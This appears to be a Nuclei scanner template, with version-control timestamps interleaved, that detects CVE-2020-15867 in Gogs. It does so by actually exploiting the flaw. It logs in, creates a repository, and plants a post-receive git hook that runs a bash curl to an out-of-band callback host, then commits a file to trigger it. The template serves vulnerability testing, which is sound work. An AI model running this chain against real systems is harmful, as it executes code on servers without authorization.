2023-03-18 22:07:09 +00:00
id : CVE-2020-15867
info :
2023-03-28 18:52:37 +00:00
name : Gogs 0.5.5 - 0.12.2 - Remote Code Execution
2023-03-18 22:07:09 +00:00
author : theamanrawat
severity : high
description : |
2023-03-28 20:49:16 +00:00
Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE : Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
2023-03-18 22:07:09 +00:00
reference :
- https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
2023-03-20 07:05:15 +00:00
- https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
- http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
2023-03-28 18:52:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-15867
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score : 7.2
cve-id : CVE-2020-15867
2023-07-11 19:49:27 +00:00
epss-score : 0.96555
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
2023-03-18 22:07:09 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 7
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : gogs
product : gogs
tags : cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- raw :
- |
GET /user/login HTTP/1.1
Host : {{Hostname}}
- |
POST /user/login HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
- |
GET /repo/create HTTP/1.1
Host : {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
- |
POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
- |
GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host : {{Hostname}}
- |
POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
cookie-reuse : true
2023-07-11 19:49:27 +00:00
2023-03-18 22:07:09 +00:00
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
2023-07-11 19:49:27 +00:00
- http
2023-03-18 22:07:09 +00:00
- type : word
part : body_1
words :
2023-07-11 19:49:27 +00:00
- content="Gogs
2023-03-18 22:07:09 +00:00
extractors :
- type : regex
name : csrf
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="_csrf" value="(.*)"
2023-03-18 22:07:09 +00:00
internal : true
- type : regex
name : auth_csrf
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="_csrf" content="(.*)"
2023-03-18 22:07:09 +00:00
internal : true
- type : regex
name : last_commit
group : 1
regex :
2023-07-11 19:49:27 +00:00
- name="last_commit" value="(.*)"
2023-03-18 22:07:09 +00:00
internal : true